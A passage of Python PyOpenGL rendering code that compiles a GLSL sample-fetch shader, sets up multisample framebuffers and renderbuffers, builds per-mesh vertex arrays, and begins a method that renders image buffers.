FETCH_FRAGMENT_SHADER = shaders.compileShader("""#version 330 core
#extension GL_ARB_explicit_uniform_location : enable
#extension GL_ARB_explicit_attrib_location : enable
layout(location = 2) uniform sampler2DMS colors;
layout(location = 3) uniform sampler2DMS sample_positions;
layout(location = 4) uniform usampler2DMS sample_faces;
layout(location = 5) uniform sampler2DMS sample_barycentric_coords1;
layout(location = 6) uniform sampler2DMS sample_barycentric_coords2;
uniform float ww;
uniform float wh;
uniform int sample;
// Ouput data
layout(location = 0) out vec3 colorFetchOut;
layout(location = 1) out vec2 sample_pos;
layout(location = 2) out uint sample_face;
layout(location = 3) out vec2 sample_barycentric1;
layout(location = 4) out vec2 sample_barycentric2;
//out int gl_SampleMask[];
const int all_sample_mask = 0xffff;
void main(){
ivec2 texcoord = ivec2(gl_FragCoord.xy);
colorFetchOut = texelFetch(colors, texcoord, sample).xyz;
sample_pos = texelFetch(sample_positions, texcoord, sample).xy;
sample_face = texelFetch(sample_faces, texcoord, sample).r;
sample_barycentric1 = texelFetch(sample_barycentric_coords1, texcoord, sample).xy;
sample_barycentric2 = texelFetch(sample_barycentric_coords2, texcoord, sample).xy;
}""", GL.GL_FRAGMENT_SHADER)
GL.glClampColor(GL.GL_CLAMP_READ_COLOR, False)
# GL.glClampColor(GL.GL_CLAMP_VERTEX_COLOR, False)
# GL.glClampColor(GL.GL_CLAMP_FRAGMENT_COLOR, False)
self.fetchSamplesProgram = shaders.compileProgram(FETCH_VERTEX_SHADER, FETCH_GEOMETRY_SHADER, FETCH_FRAGMENT_SHADER)
self.textureGT = GL.GLuint(0)
# GL.glActiveTexture(GL.GL_TEXTURE1)
# GL.glGenTextures(1, self.textureGT)
# GL.glBindTexture(GL.GL_TEXTURE_2D, self.textureGT)
# self.textureGTLoc = GL.glGetUniformLocation(self.errorTextureProgram, "imageGT")
# GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT,1)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_LINEAR)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR_MIPMAP_LINEAR)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_BASE_LEVEL, 0)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAX_LEVEL, 0)
# #
# try:
# if self.imageGT.r is not None and self.imageGT.r.size != 0: #if GT image is defined.
# image = np.array(np.flipud((self.imageGT.r)), order='C', dtype=np.float32)
# GL.glTexStorage2D(GL.GL_TEXTURE_2D, 1, GL.GL_RGB32F, image.shape[1], image.shape[0])
# GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image)
# except:
# pass
# GL.glGenTextures(1, self.textureEdges)
# GL.glBindTexture(GL.GL_TEXTURE_2D, self.textureEdges)
# GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT,1)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_BASE_LEVEL, 0)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAX_LEVEL, 0)
# GL.glActiveTexture(GL.GL_TEXTURE0)
whitePixel = np.ones([1,1,3])
self.whitePixelTextureID = GL.GLuint(0)
GL.glGenTextures( 1, self.whitePixelTextureID )
GL.glBindTexture(GL.GL_TEXTURE_2D, self.whitePixelTextureID)
image = np.array(np.flipud((whitePixel)), order='C', dtype=np.float32)
GL.glTexStorage2D(GL.GL_TEXTURE_2D, 1, GL.GL_RGB32F, image.shape[1], image.shape[0])
GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image)
self.fbo_ms_errors = GL.glGenFramebuffers(1)
GL.glDepthMask(GL.GL_TRUE)
GL.glEnable(GL.GL_MULTISAMPLE)
# GL.glHint(GL.GL_MULTISAMPLE_FILTER_HINT_NV, GL.GL_NICEST);
GL.glEnable(GL.GL_SAMPLE_SHADING)
GL.glMinSampleShading(1.0)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo_ms_errors)
self.texture_errors_render = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_render)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_RGB8, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_render, 0)
self.texture_errors_sample_position = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_position)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_RG32F, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT1, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_position, 0)
self.texture_errors_sample_faces = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_faces)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_R32UI, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT2, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_faces, 0)
#
self.texture_errors_sample_barycentric1 = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric1)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_RG32F, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT3, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric1, 0)
self.texture_errors_sample_barycentric2 = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric2)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_RG32F, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT4, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric2, 0)
self.z_buf_ms_errors = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.z_buf_ms_errors)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_DEPTH_COMPONENT, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_DEPTH_ATTACHMENT, GL.GL_TEXTURE_2D_MULTISAMPLE, self.z_buf_ms_errors, 0)
# self.z_buf_ms_errors = GL.glGenRenderbuffers(1)
# GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.z_buf_ms_errors)
# GL.glRenderbufferStorageMultisample(GL.GL_RENDERBUFFER, self.nsamples, GL.GL_DEPTH_COMPONENT, self.frustum['width'], self.frustum['height'])
# GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_DEPTH_ATTACHMENT, GL.GL_RENDERBUFFER, self.z_buf_ms_errors)
GL.glEnable(GL.GL_DEPTH_TEST)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
# GL.glDisable(GL.GL_CULL_FACE)
GL.glClear(GL.GL_COLOR_BUFFER_BIT)
GL.glClear(GL.GL_DEPTH_BUFFER_BIT)
print("FRAMEBUFFER ERR: " + str(GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER)))
assert (GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER) == GL.GL_FRAMEBUFFER_COMPLETE)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, 0)
self.fbo_sample_fetch = GL.glGenFramebuffers(1)
GL.glDepthMask(GL.GL_TRUE)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo_sample_fetch)
self.render_buffer_fetch_sample_render = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_render)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RGB8, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_render)
self.render_buffer_fetch_sample_position = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_position)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT1, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_position)
self.render_buffer_fetch_sample_face = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_face)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_R32UI, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT2, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_face)
#
self.render_buffer_fetch_sample_barycentric1 = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_barycentric1)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT3, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_barycentric1)
self.render_buffer_fetch_sample_barycentric2 = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_barycentric2)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT4, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_barycentric2)
self.z_buf_samples_errors = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.z_buf_samples_errors)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_DEPTH_COMPONENT, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_DEPTH_ATTACHMENT, GL.GL_RENDERBUFFER, self.z_buf_samples_errors)
GL.glEnable(GL.GL_DEPTH_TEST)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
GL.glDisable(GL.GL_CULL_FACE)
GL.glClear(GL.GL_COLOR_BUFFER_BIT)
GL.glClear(GL.GL_DEPTH_BUFFER_BIT)
print("FRAMEBUFFER ERR: " + str(GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER)))
assert (GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER) == GL.GL_FRAMEBUFFER_COMPLETE)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, 0)
#FBO_f
self.fbo_errors_nonms = GL.glGenFramebuffers(1)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo_errors_nonms)
render_buf_errors_render = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_render)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RGB8, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, GL.GL_RENDERBUFFER, render_buf_errors_render)
render_buf_errors_sample_position = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_sample_position)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT1, GL.GL_RENDERBUFFER, render_buf_errors_sample_position)
render_buf_errors_sample_face = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_sample_face)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_R32UI, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT2, GL.GL_RENDERBUFFER, render_buf_errors_sample_face)
#
render_buf_errors_sample_barycentric1 = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_sample_barycentric1)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT3, GL.GL_RENDERBUFFER, render_buf_errors_sample_barycentric1)
render_buf_errors_sample_barycentric2 = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_sample_barycentric2)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT4, GL.GL_RENDERBUFFER, render_buf_errors_sample_barycentric2)
#
z_buf_samples_errors = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, z_buf_samples_errors)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_DEPTH_COMPONENT, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_DEPTH_ATTACHMENT, GL.GL_RENDERBUFFER, z_buf_samples_errors)
GL.glClear(GL.GL_COLOR_BUFFER_BIT)
GL.glClear(GL.GL_DEPTH_BUFFER_BIT)
print("FRAMEBUFFER ERR: " + str(GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER)))
assert (GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER) == GL.GL_FRAMEBUFFER_COMPLETE)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, 0)
self.textureObjLoc = GL.glGetUniformLocation(self.errorTextureProgram, "myTextureSampler")
#Add background cube:
position_location = GL.glGetAttribLocation(self.errorTextureProgram, 'position')
color_location = GL.glGetAttribLocation(self.errorTextureProgram, 'colorIn')
uvs_location = GL.glGetAttribLocation(self.errorTextureProgram, 'vertexUV')
face_ids_location = GL.glGetAttribLocation(self.errorTextureProgram, 'face_id')
barycentric_location = GL.glGetAttribLocation(self.errorTextureProgram, 'barycentric')
# self.vbo_verts_cube= vbo.VBO(np.array(self.v_bgCube).astype(np.float32))
# self.vbo_colors_cube= vbo.VBO(np.array(self.vc_bgCube).astype(np.float32))
# self.vbo_uvs_cube = vbo.VBO(np.array(self.ft_bgCube).astype(np.float32))
# self.vao_bgCube = GL.GLuint(0)
# GL.glGenVertexArrays(1, self.vao_bgCube)
#
# GL.glBindVertexArray(self.vao_bgCube)
# self.vbo_f_bgCube = vbo.VBO(np.array(self.f_bgCube).astype(np.uint32), target=GL.GL_ELEMENT_ARRAY_BUFFER)
# self.vbo_f_bgCube.bind()
# self.vbo_verts_cube.bind()
# GL.glEnableVertexAttribArray(position_location) # from 'location = 0' in shader
# GL.glVertexAttribPointer(position_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
# self.vbo_colors_cube.bind()
# GL.glEnableVertexAttribArray(color_location) # from 'location = 0' in shader
# GL.glVertexAttribPointer(color_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
# self.vbo_uvs_cube.bind()
# GL.glEnableVertexAttribArray(uvs_location) # from 'location = 0' in shader
# GL.glVertexAttribPointer(uvs_location, 2, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
#
# f = self.f_bgCube
# fc = np.tile(np.arange(len(self.f), len(self.f) + len(f))[:, None], [1, 3]).ravel()
# # fc[:, 0] = fc[:, 0] & 255
# # fc[:, 1] = (fc[:, 1] >> 8) & 255
# # fc[:, 2] = (fc[:, 2] >> 16) & 255
# fc = np.asarray(fc, dtype=np.uint32)
# vbo_face_ids_cube = vbo.VBO(fc)
# vbo_face_ids_cube.bind()
# GL.glEnableVertexAttribArray(face_ids_location) # from 'location = 0' in shader
# GL.glVertexAttribIPointer(face_ids_location, 1, GL.GL_UNSIGNED_INT, 0, None)
#
# #Barycentric cube:
# f_barycentric = np.asarray(np.tile(np.eye(3), (f.size // 3, 1)), dtype=np.float32, order='C')
# vbo_barycentric_cube = vbo.VBO(f_barycentric)
# vbo_barycentric_cube.bind()
# GL.glEnableVertexAttribArray(barycentric_location) # from 'location = 0' in shader
# GL.glVertexAttribPointer(barycentric_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
GL.glBindVertexArray(0)
self.vao_quad = GL.GLuint(0)
GL.glGenVertexArrays(1, self.vao_quad)
GL.glBindVertexArray(self.vao_quad)
#Bind VAO
self.vbo_face_ids_list = []
self.vbo_barycentric_list = []
self.vao_errors_mesh_list = []
flen = 1
for mesh in range(len(self.f_list)):
vaos_mesh = []
vbo_face_ids_mesh = []
vbo_barycentric_mesh = []
for polygons in np.arange(len(self.f_list[mesh])):
vao = GL.GLuint(0)
GL.glGenVertexArrays(1, vao)
GL.glBindVertexArray(vao)
vbo_f = self.vbo_indices_mesh_list[mesh][polygons]
vbo_f.bind()
vbo_verts = self.vbo_verts_mesh[mesh][polygons]
vbo_verts.bind()
GL.glEnableVertexAttribArray(position_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(position_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
vbo_colors = self.vbo_colors_mesh[mesh][polygons]
vbo_colors.bind()
GL.glEnableVertexAttribArray(color_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(color_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
vbo_uvs = self.vbo_uvs_mesh[mesh][polygons]
vbo_uvs.bind()
GL.glEnableVertexAttribArray(uvs_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(uvs_location, 2, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
f = self.f_list[mesh][polygons]
fc = np.tile(np.arange(flen, flen + len(f))[:,None], [1,3]).ravel()
# fc[:, 0] = fc[:, 0] & 255
# fc[:, 1] = (fc[:, 1] >> 8) & 255
# fc[:, 2] = (fc[:, 2] >> 16) & 255
fc = np.asarray(fc, dtype=np.uint32)
vbo_face_ids = vbo.VBO(fc)
vbo_face_ids.bind()
GL.glEnableVertexAttribArray(face_ids_location) # from 'location = 0' in shader
GL.glVertexAttribIPointer(face_ids_location, 1, GL.GL_UNSIGNED_INT, 0, None)
f_barycentric = np.asarray(np.tile(np.eye(3), (f.size // 3, 1)), dtype=np.float32, order='C')
vbo_barycentric = vbo.VBO(f_barycentric)
vbo_barycentric.bind()
GL.glEnableVertexAttribArray(barycentric_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(barycentric_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
flen += len(f)
vaos_mesh += [vao]
vbo_face_ids_mesh += [vbo_face_ids]
vbo_barycentric_mesh += [vbo_face_ids]
GL.glBindVertexArray(0)
self.vbo_face_ids_list += [vbo_face_ids_mesh]
self.vbo_barycentric_list += [vbo_barycentric_mesh]
self.vao_errors_mesh_list += [vaos_mesh]
def render_image_buffers(self):
GL.glEnable(GL.GL_MULTISAMPLE)
GL.glEnable(GL.GL_SAMPLE_SHADING)
GL.glMinSampleShading(1.0)
self.makeCurrentContext()
if hasattr(self, 'bgcolor'):
GL.glClearColor(self.bgcolor.r[0], self.bgcolor.r[1%self.num_channels], self.bgcolor.r[2%self.num_channels], 1.)
GL.glUseProgram(self.errorTextureProgram)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_ms_errors)
drawingBuffers = [GL.GL_COLOR_ATTACHMENT0, GL.GL_COLOR_ATTACHMENT1, GL.GL_COLOR_ATTACHMENT2, GL.GL_COLOR_ATTACHMENT3, GL.GL_COLOR_ATTACHMENT4]
GL.glDrawBuffers(5, drawingBuffers)
# GL.glClearBufferiv(GL.GL_COLOR, 0, 0)
GL.glClearColor(0., 0., 0., 0.)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
wwLoc = GL.glGetUniformLocation(self.errorTextureProgram, 'ww')
whLoc = GL.glGetUniformLocation(self.errorTextureProgram, 'wh')
GL.glUniform1f(wwLoc, self.frustum['width'])
GL.glUniform1f(whLoc, self.frustum['height'])
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))),np.float32))
MVP = np.dot(self.projectionMatrix, view_mtx)
for mesh in range(len(self.f_list)):
for polygons in np.arange(len(self.f_list[mesh])):
vao_mesh = self.vao_errors_mesh_list[mesh][polygons]
vbo_f = self.vbo_indices_mesh_list[mesh][polygons]
GL.glBindVertexArray(vao_mesh)
# vbo_color.bind()
f = self.f_list[mesh][polygons]
colors_by_face = np.asarray(self.vc_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
self.vbo_colors_mesh[mesh][polygons].set_array(colors_by_face.astype(np.float32))
self.vbo_colors_mesh[mesh][polygons].bind()
if self.f.shape[1]==2:
primtype = GL.GL_LINES
else:
primtype = GL.GL_TRIANGLES
assert(primtype == GL.GL_TRIANGLES)
# GL.glUseProgram(self.errorTextureProgram)
if self.haveUVs_list[mesh][polygons]:
texture = self.textureID_mesh_list[mesh][polygons]
else:
texture = self.whitePixelTextureID
GL.glActiveTexture(GL.GL_TEXTURE0)
GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
GL.glUniform1i(self.textureObjLoc, 0)
GL.glUniformMatrix4fv(self.MVP_texture_location, 1, GL.GL_TRUE, MVP)
GL.glDrawArrays(primtype, 0, len(vbo_f)*vbo_f.data.shape[1])
# # #Background cube:
# GL.glBindVertexArray(self.vao_bgCube)
# self.vbo_f_bgCube.bind()
# texture = self.whitePixelTextureID
# self.vbo_uvs_cube.bind()
#
# GL.glActiveTexture(GL.GL_TEXTURE0)
# GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
# GL.glUniform1i(self.textureObjLoc, 0)
# GL.glUniformMatrix4fv(self.MVP_texture_location, 1, GL.GL_TRUE, MVP)
#
# GL.glDrawElements(primtype, len(self.vbo_f_bgCube)*self.vbo_f_bgCube.data.shape[1], GL.GL_UNSIGNED_INT, None)
# self.draw_visibility_image_ms(self.v, self.f)
# GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, 0)
#
# GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_ms_errors)
# GL.glFramebufferTexture2D(GL.GL_READ_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_render, 0)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
# GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_errors_nonms)
# GL.glDrawBuffer(GL.GL_COLOR_ATTACHMENT0)
# GL.glBlitFramebuffer(0, 0, self.frustum['width'], self.frustum['height'], 0, 0, self.frustum['width'], self.frustum['height'],GL.GL_COLOR_BUFFER_BIT, GL.GL_NEAREST)
# GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_errors_nonms)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
# # result_blit = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:3].astype(np.float64))
# result_blit2 = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:3].astype(np.float64))
#
# GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_ms_errors)
# GL.glFramebufferTexture2D(GL.GL_READ_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT1, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_position, 0)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT1)
# GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_errors_nonms)
# GL.glDrawBuffer(GL.GL_COLOR_ATTACHMENT1)
# GL.glBlitFramebuffer(0, 0, self.frustum['width'], self.frustum['height'], 0, 0, self.frustum['width'], self.frustum['height'],GL.GL_COLOR_BUFFER_BIT, GL.GL_NEAREST)
# GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_errors_nonms)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT1)
# result_blit_pos = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:3].astype(np.float64))
GL.glUseProgram(self.fetchSamplesProgram)
# GL.glDisable(GL.GL_MULTISAMPLE)
self.colorsLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, "colors")
self.sample_positionsLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, "sample_positions")
self.sample_facesLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, "sample_faces")
self.sample_barycentric1Loc = GL.glGetUniformLocation(self.fetchSamplesProgram, "sample_barycentric_coords1")
self.sample_barycentric2Loc = GL.glGetUniformLocation(self.fetchSamplesProgram, "sample_barycentric_coords2")
# GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
# GL.glActiveTexture(GL.GL_TEXTURE2)
# GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_face)
# GL.glUniform1i(self.sample_facesLoc, 2)
wwLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, 'ww')
whLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, 'wh')
